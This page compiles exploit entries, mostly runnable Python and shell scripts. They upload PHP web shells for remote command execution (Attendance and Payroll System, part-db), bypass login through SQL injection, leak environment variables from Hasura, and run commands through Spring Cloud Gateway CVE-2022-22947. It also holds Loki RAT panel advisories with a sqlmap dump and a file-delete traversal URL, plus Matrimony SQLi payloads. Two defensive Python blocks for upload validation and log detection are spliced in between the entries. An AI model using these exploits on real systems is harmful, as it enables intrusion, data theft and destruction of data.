<pre><code># Exploit Title: Attendance and Payroll System v1.0 - Remote Code Execution (RCE)<br /># Date: 04/03/2022<br /># Exploit Author: pr0z<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip<br /># Version: v1.0<br /># Tested on: Linux, MySQL, Apache<br /><br />import requests<br />import sys<br />from requests.exceptions import ConnectionError<br /><br /># Interface class to display terminal messages<br />class Interface():<br />    def __init__(self):<br />        self.red = '\033[91m'<br />        self.green = '\033[92m'<br />        self.white = '\033[37m'<br />        self.yellow = '\033[93m'<br />        self.bold = '\033[1m'<br />        self.end = '\033[0m'<br /><br />    def header(self):<br />        print('\n >> Attendance and Payroll System v1.0')<br />        print(' >> Unauthenticated Remote Code Execution')<br />        print(' >> By pr0z\n')<br /><br />    def info(self, message):<br />        print(f"[{self.white}*{self.end}] {message}")<br /><br />    def warning(self, message):<br />        print(f"[{self.yellow}!{self.end}] {message}")<br /><br />    def error(self, message):<br />        print(f"[{self.red}x{self.end}] {message}")<br /><br />    def success(self, message):<br />        print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}")<br /><br /><br />upload_path = '/apsystem/admin/employee_edit_photo.php'<br />shell_path = '/apsystem/images/shell.php'<br />#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}<br /><br />shell_data = "<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd);}?>"<br /><br />multipart_form_data = {<br />    'id': 1,<br />    'upload': (''),<br />}<br /><br />files = {'photo': ('shell.php', shell_data)}<br /><br />output = Interface()<br />output.header()<br /><br /># Check for arguments<br />if len(sys.argv) < 2 or '-h' in sys.argv:<br />    output.info("Usage: python3 rce.py http://127.0.0.1")<br />    sys.exit()<br /><br /># Upload the shell<br />target = sys.argv[1]<br />output.info(f"Uploading the web shell to {target}")<br />r = requests.post(target + upload_path, files=files, data=multipart_form_data, verify=False)<br /><br /># Validating shell has been uploaded<br />output.info(f"Validating the shell has been uploaded to {target}")<br />r = requests.get(target + shell_path, verify=False)<br />try:<br />    r = requests.get(target + shell_path)<br />    if r.status_code == 200:<br />        output.success('Successfully connected to web shell\n')<br />    else:<br />        raise Exception<br />except ConnectionError:<br />    output.error('We were unable to establish a connection')<br />    sys.exit()<br />except:<br />    output.error('Something unexpected happened')<br />    sys.exit()<br /><br /># Remote code execution<br />while True:<br />    try:<br />        cmd = input("\033[91mRCE\033[0m > ")<br />        if cmd == 'exit':<br />            raise KeyboardInterrupt<br />        r = requests.get(target + shell_path + "?cmd=" + cmd, verify=False)<br />        if r.status_code == 200:<br />            print(r.text)<br />        else:<br />            raise Exception<br />    except KeyboardInterrupt:<br />        sys.exit()<br />    except ConnectionError:<br />        output.error('We lost our connection to the web shell')<br />        sys.exit()<br />    except:<br />        output.error('Something unexpected happened')<br />        sys.exit()<br /><br /></code></pre>
<pre><code># Exploit Title: Attendance and Payroll System v1.0 - SQLi Authentication Bypass<br /># Date: 04/03/2022<br /># Exploit Author: pr0z<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip<br /># Version: v1.0<br /># Tested on: Linux, MySQL, Apache<br /><br />import requests<br />import sys<br />from requests.exceptions import ConnectionError<br /><br /><br />print('\n >> Attendance and Payroll System v1.0')<br />print(' >> Authentication Bypass through SQL injection')<br />print(' >> By pr0z\n')<br /><br />login_path = '/apsystem/admin/login.php'<br />index_path = '/apsystem/admin/index.php'<br /><br />payload = "username=nobodyhavethisusername' UNION SELECT 1 as id, 'myuser' as username, '$2y$10$UNm8zqwv6d07rp3zr6iGD.GXNqo/P4qB7fUZB79M3vmpQ6SidGi.G' as password ,'zzz' as firstname,'zzz' as lastname,'zzz.php' as photo, '2018-04-30' as created_on -- &password=test&login="<br />headers = {'Content-Type': 'application/x-www-form-urlencoded'}<br />#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}<br /><br /><br /># Check for arguments<br />if len(sys.argv) < 2 or '-h' in sys.argv:<br />    print("[!] Usage: python3 apsystem_sqli.py http://127.0.0.1")<br />    sys.exit()<br /><br /># Bypass Authentication<br />target = sys.argv[1]<br />print("[+] Extracting Administrator cookie using SQLi ...")<br />sess = requests.Session()<br />try:<br />    sess.get(target + index_path, headers=headers, verify=False)<br />    sess.post(target + login_path, data=payload, headers=headers, verify=False)<br />except ConnectionError:<br />    print('[-] We were unable to establish a connection')<br />    sys.exit()<br /><br />cookie_val = sess.cookies.get_dict().get("PHPSESSID")<br /><br />print("[+] Use the following cookie:\n")<br />print(f"PHPSESSID: {cookie_val}")<br /><br /></code></pre>
<pre><code># Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure<br /># Software: Hasura GraphQL Community<br /># Software Link: https://github.com/hasura/graphql-engine<br /># Version: 2.2.0<br /># Exploit Author: Dolev Farhi<br /># Date: 5/05/2022<br /># Tested on: Ubuntu<br /><br />import requests<br /><br />SERVER_ADDR = 'x.x.x.x'<br /><br />url = 'http://{}/v1/metadata'.format(SERVER_ADDR)<br /><br />print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read')<br /><br />while True:<br />    env_var = input('Type environment variable key to leak.\n> ')<br />    if not env_var:<br />        continue<br /><br />    payload = {<br />        "type": "bulk",<br />        "source": "",<br />        "args": [<br />            {<br />                "type": "add_remote_schema",<br />                "args": {<br />                    "name": "ttt",<br />                    "definition": {<br />                        "timeout_seconds": 60,<br />                        "forward_client_headers": False,<br />                        "headers": [],<br />                        "url_from_env": env_var<br />                    },<br />                    "comment": ""<br />                }<br />            }<br />        ],<br />        "resource_version": 2<br />    }<br />    r = requests.post(url, json=payload)<br />    try:<br />        print(r.json()['error'].split('not a valid URI:')[1])<br />    except IndexError:<br />        print('Could not parse out VAR, dumping error as is')<br />        print(r.json().get('error', 'N/A'))<br /><br /></code></pre>
<pre><code># Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)<br /># Google Dork: N/A<br /># Date: 03/03/2022<br /># Exploit Author: Carlos E. Vieira<br /># Vendor Homepage: https://spring.io/<br /># Software Link: https://spring.io/projects/spring-cloud-gateway<br /># Version: This vulnerability affects Spring Cloud Gateway < 3.0.7 & < 3.1.1<br /># Tested on: 3.1.0<br /># CVE : CVE-2022-22947<br /><br />import random<br />import string<br />import requests<br />import json<br />import sys<br />import urllib.parse<br />import base64<br /><br />headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'}<br />proxies = {<br />    'http': 'http://172.29.32.1:8081',<br />    'https': 'http://172.29.32.1:8081',<br />}<br />id = ''.join(random.choice(string.ascii_lowercase) for i in range(8))<br /><br />def exploit(url, command):<br /><br />    payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"}<br /><br />    commandb64 = base64.b64encode(command.encode('utf-8')).decode('utf-8')<br /><br />    rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), proxies=proxies, verify=False)<br />    if(rbase.status_code == 201):<br />        print("[+] Stage deployed to /actuator/gateway/routes/"+id)<br />        print("[+] Executing command...")<br />        r = requests.post(url + '/actuator/gateway/refresh', headers=headers, proxies=proxies, verify=False)<br />        if(r.status_code == 200):<br />            print("[+] getting result...")<br />            r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)<br />            if(r.status_code == 200):<br />                get_response = r.json()<br />                clean(url, id)<br />                return get_response['filters'][0].split("'")[1]<br />            else:<br />                print("[-] Error: Invalid response")<br />                clean(url, id)<br />                exit(1)<br />        else:<br />            clean(url, id)<br />            print("[-] Error executing command")<br /><br /><br />def clean(url, id):<br />    remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)<br />    if(remove.status_code == 200):<br />        print("[+] Stage removed!")<br />    else:<br />        print("[-] Error: Fail to remove stage")<br /><br />def banner():<br />    print("""<br />    #####################################################<br />    #                                                   #<br />    #            Exploit for CVE-2022-22947             #<br />    #             - Carlos Vieira (Crowsec)             #<br />    #                                                   #<br />    #  Usage:                                           #<br />    #    python3 exploit.py <url> <command>             #<br />    #                                                   #<br />    #  Example:                                         #<br />    #    python3 exploit.py http://localhost:8080 'id'  #<br />    #                                                   #<br />    #####################################################<br />    """)<br /><br />def main():<br />    banner()<br />    if len(sys.argv) != 3:<br />        print("[-] Error: Invalid arguments")<br />        print("[-] Usage: python3 exploit.py <url> <command>")<br />        exit(1)<br />    else:<br />        url = sys.argv[1]<br />        command = sys.argv[2]<br />        print(exploit(url, command))<br /><br />if __name__ == '__main__':<br />    main()<br /><br /></code></pre>
<pre><code># Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE)<br /># Google Dork: NA<br /># Date: 03/04/2022<br /># Exploit Author: Sunny Mehra @DSKMehra<br /># Vendor Homepage: https://github.com/part-db/part-db<br /># Software Link: https://github.com/part-db/part-db<br /># Version: [ 0.5.11.] <br /># Tested on: [KALI OS]<br /># CVE : CVE-2022-0848<br />#<br />---------------<br /><br />#!/bin/bash<br />host=127.0.0.1/Part-DB-0.5.10 #WEBHOST<br />#Usage: Change host <br />#Command: bash exploit.sh<br />#EXPLOIT BY @DSKMehra<br />echo "<?php system(id); ?>">POC.phtml #PHP Shell Code<br />result=`curl -i -s -X POST -F "logo_file=@POC.phtml" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'`<br />rm POC.phtml<br />echo Shell Location : "$host/data/media/labels/$result"<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/aabb54951546132e70a8e9f02bf8b5ba_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Loki RAT (Relapse)<br />Vulnerability: SQL Injection<br />Description: The LokiRAT WebUI panel for LokiRAT_Relapse.exe runs on PHP and MySQL and is used to control infected hosts through a central server.<br />The backend server-side code "admin.php" does not use any secure coding practices, nor does it sanitize or filter user input when constructing MySQL statements.<br /><br />Loki admin.php takes four parameters: pass, command, id and type. There's an auth check comparing $_GET['pass'] against the clear-text password "test" in settings.php.<br /><br />The $_GET['id'] parameter is used directly in the SELECT * FROM vircom WHERE id='$id' statement passed to mysql_query(), making it vulnerable to post-auth SQL injection.<br />Authenticated users or third-party attackers who can guess the password can easily dump all databases, tables and contents, including the MySQL database schema.<br /><br />admin.php snippet:<br /><br />if ($_GET['pass'] == $password) {<br />    $command = $_REQUEST['command'];<br />    $id = $_GET['id'];<br />    $type = $_GET['type'];<br />    ....<br /><br />        case "response":<br />            $query = mysql_query("SELECT * FROM vircom WHERE id='$id'");<br />            $row = mysql_fetch_array($query);<br />            echo $row['retCommandNum'] . "{-}" . $row['retCommand'] . "{-}" . $row['lastUpdate'] . "{-}" . $row['updateInterval'];<br />            break;<br /><br />Family: Loki<br />Type: WebUI<br />MD5: aabb54951546132e70a8e9f02bf8b5ba<br />MD5: 16c33e28c8c9b3ea71249ad94be4bf94 (admin.php)<br />Vuln ID: MVID-2022-0510<br />Disclosure: 03/05/2022<br /><br />Exploit/PoC:<br />sqlmap.py -u "http://LOKI-RAT-IP/PHP%20Files/admin.php?pass=test&command=webcam&id=1&type=response" --dbms=MySQL --risk=3 --level=5 --dump<br /><br />[21:06:25] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable<br />GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N<br />sqlmap identified the following injection point(s) with a total of 11385 HTTP(s) requests:<br />...<br /><br />back-end DBMS: MySQL >= 5.0.12<br />[21:06:57] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries<br />[21:06:57] [INFO] fetching current database<br />[21:06:57] [INFO] fetching tables for database: 'lokirat2'<br />[21:06:57] [INFO] the SQL query used returns 2 entries<br />[21:06:57] [INFO] retrieved: klcom<br />[21:06:57] [INFO] retrieved: vircom<br />[21:06:57] [INFO] fetching columns for table 'vircom' in database 'lokirat2'<br />[21:06:57] [INFO] the SQL query used returns 13 entries<br />[21:06:57] [INFO] retrieved: "id","varchar(12)"<br />[21:06:57] [INFO] retrieved: "ipAddress","varchar(15)"<br />[21:06:57] [INFO] retrieved: "location","varchar(255)"<br />[21:06:57] [INFO] retrieved: "compName","varchar(30)"<br />[21:06:57] [INFO] retrieved: "operatingSystem","varchar(100)"<br />[21:06:57] [INFO] retrieved: "command","text"<br />[21:06:57] [INFO] retrieved: "retCommand","text"<br />[21:06:57] [INFO] retrieved: "retCommandNum","int(11)"<br />[21:06:57] [INFO] retrieved: "lastUpdate","datetime"<br />[21:06:57] [INFO] retrieved: "updateInterval","int(9)"<br />[21:06:57] [INFO] retrieved: "ramMemory","varchar(50)"<br />[21:06:57] [INFO] retrieved: "processor","varchar(255)"<br />[21:06:57]
[INFO] retrieved: "webcam","int(1)"<br />[21:06:57] [INFO] fetching entries for table 'vircom' in database 'lokirat2'<br />[21:06:57] [INFO] the SQL query used returns 1 entries<br />[21:06:57] [INFO] analyzing table dump for possible password hashes<br />Database: lokirat2<br />Table: vircom<br />[1 entry]<br />+----+--------+---------+----------+--------------+-----------+-----------+-----------+---------------------+------------+---------------+----------------+-----------------+<br />| id | webcam | command | compName | location | processor | ramMemory | ipAddress | lastUpdate | retCommand | retCommandNum | updateInterval | operatingSystem |<br />+----+--------+---------+----------+--------------+-----------+-----------+-----------+---------------------+------------+---------------+----------------+-----------------+<br />| 1 | 1 | melt | Hate | New York USA | Intel64 | 15gb | 10.2.1.3 | 2022-03-05 02:43:34 | doit | 666 | 0 | Windows |<br />+----+--------+---------+----------+--------------+-----------+-----------+-----------+---------------------+------------+---------------+----------------+-----------------+<br /><br />[21:06:57] [INFO] table 'lokirat2.vircom' dumped to CSV file 'C:\Users\Victim\.sqlmap\output\127.0.0.1\dump\lokirat2\vircom.csv'<br />[21:06:57] [INFO] fetching columns for table 'klcom' in database 'lokirat2'<br />[21:06:57] [INFO] the SQL query used returns 3 entries<br />[21:06:57] [INFO] retrieved: "id","varchar(15)"<br />[21:06:57] [INFO] retrieved: "kldata","text"<br />[21:06:57] [INFO] retrieved: "dateTime","datetime"<br />[21:06:57] [INFO] fetching entries for table 'klcom' in database 'lokirat2'<br />[21:06:57] [INFO] the SQL query used returns 1 entries<br />[21:06:57] [INFO] analyzing table dump for possible password hashes<br />Database: lokirat2<br />Table: klcom<br />[1 entry]<br />+----+----------------+---------------------+<br />| id | kldata | dateTime |<br />+----+----------------+---------------------+<br />| 1 | KILL PUTIN 
| 2022-03-05 02:42:59 |<br />+----+----------------+---------------------+<br /><br />[21:06:57] [INFO] table 'lokirat2.klcom' dumped to CSV file 'C:\Users\Victim\.sqlmap\output\127.0.0.1\dump\lokirat2\klcom.csv'<br />[21:06:57] [INFO] fetched data logged to text files under 'C:\Users\Victim\.sqlmap\output\127.0.0.1'<br /><br />[*] shutting down at 21:06:57<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Private Internet Access 3.3 - 'pia-service' Unquoted Service Path<br /># Date: 04/03/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.privateinternetaccess.com<br /># Software Link: https://www.privateinternetaccess.com/download<br /># Version: 3.3.0.100<br /># Tested: Windows 10 x64<br /># Contact: https://twitter.com/dmaral3noz<br /><br /># Step to discover Unquoted Service Path:<br /><br />C:\Users\saudh>wmic service where 'name like "%PrivateInternetAccessService%"' get name, displayname, pathname, startmode, startname<br /><br />DisplayName Name PathName StartMode StartName<br />Private Internet Access Service PrivateInternetAccessService "C:\Program Files\Private Internet Access\pia-service.exe" Auto LocalSystem<br /><br /># Service info:<br /><br />C:\Users\saudh>sc qc PrivateInternetAccessService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: PrivateInternetAccessService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program Files\Private Internet Access\pia-service.exe"<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Private Internet Access Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/aabb54951546132e70a8e9f02bf8b5ba.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Loki RAT (Relapse)<br />Vulnerability: Directory Traversal - Arbitrary File Delete<br />Description: The LokiRAT WebUI panel for "LokiRAT_Relapse.exe" runs on PHP and MySQL and is used to control infected hosts through a central server.<br />The admin webpage "admin.php" takes four parameters: pass, command, id and type. There's a single check that authenticates $_GET['pass'] against a hardcoded clear-text password in settings.php.<br /><br />The backend "admin.php" code has an upload feature that uses the PHP "unlink" function to delete an existing file before moving the new one into place. However, the code does not use any secure coding practices and does not sanitize or filter user input for the directory traversal sequence "/../". This allows authenticated users, compromised bots or third-party attackers who can guess the password to delete any file (e.g. ".php", ".htaccess") in the panel root outside the "uploads/" dir, causing the Loki web panel to become inoperative.<br /><br />admin.php snippet:<br /><br />    case "upload":<br />        $fullfilename = "uploads/" . $_GET['filename'];<br />        if (file_exists($fullfilename)) unlink($fullfilename);<br />        move_uploaded_file($_FILES['file']['tmp_name'], $fullfilename);<br /><br />Family: Loki<br />Type: WebUI<br />MD5: aabb54951546132e70a8e9f02bf8b5ba<br />MD5: 16c33e28c8c9b3ea71249ad94be4bf94 (admin.php)<br />Vuln ID: MVID-2022-0509<br />Disclosure: 03/05/2022<br /><br />Exploit/PoC:<br />Delete the "settings.php" file, which holds the database connection, rendering the backend inoperative.<br /><br />http://LOKI-RAT-IP/PHP%20Files/admin.php?pass=test&command=webcam&id=1&type=upload&filename=/../settings.php<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
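Both Loki RAT advisories above, and the APSystem and part-db entries earlier on this page, come down to a filename the server trusts: unlink() on "uploads/" . $_GET['filename'] in one case, a .php or .phtml "photo" written under a web-served directory in the others. The Python below is an added example of the server-side check that refuses both shapes; it is not code from any of those projects or advisories, and UPLOAD_DIR and ALLOWED_EXT are assumptions chosen for the example.

```python
"""
Server-side validation of an attacker-supplied upload filename.

Added example, not code from any advisory on this page. The Loki RAT panel
builds "uploads/" . $_GET['filename'] and unlink()s it; the APSystem and
part-db entries accept shell.php / POC.phtml as an "image". The checks
below refuse both shapes. UPLOAD_DIR and ALLOWED_EXT are assumptions.
"""
import os
from typing import Optional
from urllib.parse import unquote

UPLOAD_DIR = "/var/www/panel/uploads"            # assumed storage directory
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}  # assumed allowlist for photo uploads


def reject_reason(user_filename: str) -> Optional[str]:
    """Return None if the name is acceptable, otherwise a short reason for the refusal."""
    name = unquote(user_filename)  # decode once, so %2e%2e%2f cannot hide a traversal
    if "\x00" in name:
        return "nul byte"
    # Refuse (do not silently rename) anything carrying a directory component:
    # '/../settings.php', '..\\..\\x.png' and 'sub/x.png' are all rejected.
    if "/" in name or "\\" in name:
        return "path separator in filename"
    if name in ("", ".", ".."):
        return "empty or dot name"
    # Only the final suffix decides: 'x.png.phtml' is a .phtml file to the web server.
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_EXT:
        return f"extension {ext or '(none)'} not allowed"
    return None


def safe_upload_target(user_filename: str, base_dir: str = UPLOAD_DIR) -> Optional[str]:
    """Absolute path the upload may be written to, or None when the name is refused."""
    if reject_reason(user_filename) is not None:
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, unquote(user_filename)))
    # Belt and braces: the resolved target must still sit under base_dir.
    if os.path.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    # Names taken from the advisories on this page plus one benign name.
    for candidate in ("/../settings.php", "shell.php", "POC.phtml", "avatar.png.phtml", "avatar.png"):
        print(f"{candidate!r:22} -> {reject_reason(candidate) or safe_upload_target(candidate)}")
```

Rejecting rather than basename()-ing a traversal matters for detection: a refused request can be logged as an attack attempt, whereas silently stripping "../" hides the probe.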
<pre><code>## Title: Matrimony 1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 03.05.2022<br />## Vendor: https://www.vetbossel.in/matrimony-project-php/<br />## Software: https://cutt.ly/LOHzKd0, https://www.vetbossel.in/matrimony-project-php/<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/vetbossel.in/2022/Matrimony<br /><br />## Description:<br />The password parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https://www.vetbossel.in/matrimony-project-php/\\qou'))+' was submitted in the password parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.<br />The attacker can take control of the administrator account and of every other account on this system, and can also download all information about this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: username (POST)<br />    Type: boolean-based blind<br />    Title: OR boolean-based blind - WHERE or HAVING clause<br />    Payload: username=-5824' OR 4197=4197-- jrsh&password=i0C!o0b!U4'+(select load_file('\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https://www.vetbossel.in/matrimony-project-php/\\qou'))+'&op=Login<br /><br />    Type: error-based<br />    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br />    Payload: username=VbMOEEMf' AND (SELECT 2589 FROM(SELECT COUNT(*),CONCAT(0x7178706b71,(SELECT (ELT(2589=2589,1))),0x71706a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gXFR&password=i0C!o0b!U4'+(select load_file('\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https://www.vetbossel.in/matrimony-project-php/\\qou'))+'&op=Login<br /><br />    Type: time-based blind<br />    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />    Payload: username=VbMOEEMf' AND (SELECT 4030 FROM (SELECT(SLEEP(5)))ciQI)-- nHot&password=i0C!o0b!U4'+(select load_file('\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https://www.vetbossel.in/matrimony-project-php/\\qou'))+'&op=Login<br /><br />    Type: UNION query<br />    Title: Generic UNION query (NULL) - 1 column<br />    Payload: username=-4629' UNION ALL SELECT CONCAT(0x7178706b71,0x505747504a524d546e7842785156787361686c546c6e695873646952794a545770586447467a4d6b,0x71706a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&password=i0C!o0b!U4'+(select load_file('\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https://www.vetbossel.in/matrimony-project-php/\\qou'))+'&op=Login<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/vetbossel.in/2022/Matrimony)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/7gggih)<br /><br /><br /></code></pre>
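Most of the web-application entries on this page leave a recognisable trace in an ordinary web-server access log: writes to /actuator/gateway/... (CVE-2022-22947), a .php or .phtml file fetched from an image or label directory, a cmd= parameter, or a ../ segment inside a query value. The Python below is an added detection example and is not part of any advisory here; the log lines, the RFC 5737 addresses in them and the UPLOAD_DIRS list are constructed for the example (the paths echo the APSystem, part-db and Loki entries above). Request bodies are not recorded in an access log, so the Hasura and Matrimony issues, which live in a POST body, are outside what this can see.

```python
"""
Access-log triage for the web-application issues collected on this page.

Added example, not taken from any of the advisories: a small Combined Log
Format parser plus four rules matching the request shapes those advisories
describe. SAMPLE_LOG and UPLOAD_DIRS are constructed for the example.
"""
import re
from typing import List, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Directories that should only ever serve uploaded media (assumption for this example;
# the two paths mirror the APSystem and part-db entries above).
UPLOAD_DIRS = ("/apsystem/images/", "/data/media/labels/")
SCRIPT_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

# Constructed sample log (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
203.0.113.5 - - [05/Mar/2022:21:06:25 +0000] "POST /actuator/gateway/routes/abcdefgh HTTP/1.1" 201 0 "-" "python-requests/2.27.1"
203.0.113.5 - - [05/Mar/2022:21:06:26 +0000] "POST /actuator/gateway/refresh HTTP/1.1" 200 0 "-" "python-requests/2.27.1"
203.0.113.7 - - [05/Mar/2022:21:07:01 +0000] "GET /apsystem/images/shell.php?cmd=id HTTP/1.1" 200 312 "-" "python-requests/2.27.1"
203.0.113.9 - - [05/Mar/2022:21:08:13 +0000] "GET /PHP%20Files/admin.php?pass=test&command=webcam&id=1&type=upload&filename=/../settings.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Mar/2022:21:08:14 +0000] "GET /PHP%20Files/admin.php?pass=test&command=webcam&id=1&type=upload&filename=..%2F..%2Fsettings.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.2 - - [05/Mar/2022:21:09:00 +0000] "GET /apsystem/images/avatar_12.png HTTP/1.1" 200 4512 "-" "Mozilla/5.0"
198.51.100.3 - - [05/Mar/2022:21:09:30 +0000] "GET /data/media/labels/POC.phtml HTTP/1.1" 200 54 "-" "curl/7.81.0"
198.51.100.4 - - [05/Mar/2022:21:10:00 +0000] "GET /actuator/health HTTP/1.1" 200 15 "-" "kube-probe/1.23"
"""


def classify(line: str) -> List[str]:
    """Return the names of every rule the log line trips (empty list = nothing matched)."""
    m = CLF_RE.match(line)
    if not m:
        return []
    method = m["method"]
    url = urlsplit(m["target"])
    path = unquote(url.path)          # decode %2e%2e and friends before matching
    params = parse_qs(url.query)      # parse_qs percent-decodes the values itself
    hits = []

    # CVE-2022-22947 shape: state-changing calls to the gateway actuator (add, refresh, delete).
    if method in ("POST", "DELETE") and path.startswith("/actuator/gateway/"):
        hits.append("gateway-actuator-write")

    # A server-side script requested from a directory that should only hold uploads.
    if SCRIPT_EXT_RE.search(path) and path.startswith(UPLOAD_DIRS):
        hits.append("script-in-upload-dir")

    # Web-shell style command parameter on any request.
    if "cmd" in params:
        hits.append("cmd-parameter")

    # A '..' path segment inside any query value (the Loki panel filename shape).
    if any(TRAVERSAL_RE.search(v) for values in params.values() for v in values):
        hits.append("query-path-traversal")

    return hits


def scan(log_text: str) -> List[Tuple[int, str, List[str]]]:
    """Return (line number, client ip, rules) for every line that tripped a rule."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        hits = classify(line)
        if hits:
            findings.append((number, CLF_RE.match(line)["ip"], hits))
    return findings


if __name__ == "__main__":
    for number, ip, hits in scan(SAMPLE_LOG):
        print(f"line {number:2} {ip:15} {', '.join(hits)}")
```

The gateway rule deliberately keys on the HTTP method rather than the status code: the exploit above deletes its route afterwards, so a successful attack shows up as a POST, a POST and a DELETE in quick succession from one client, not as an error.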
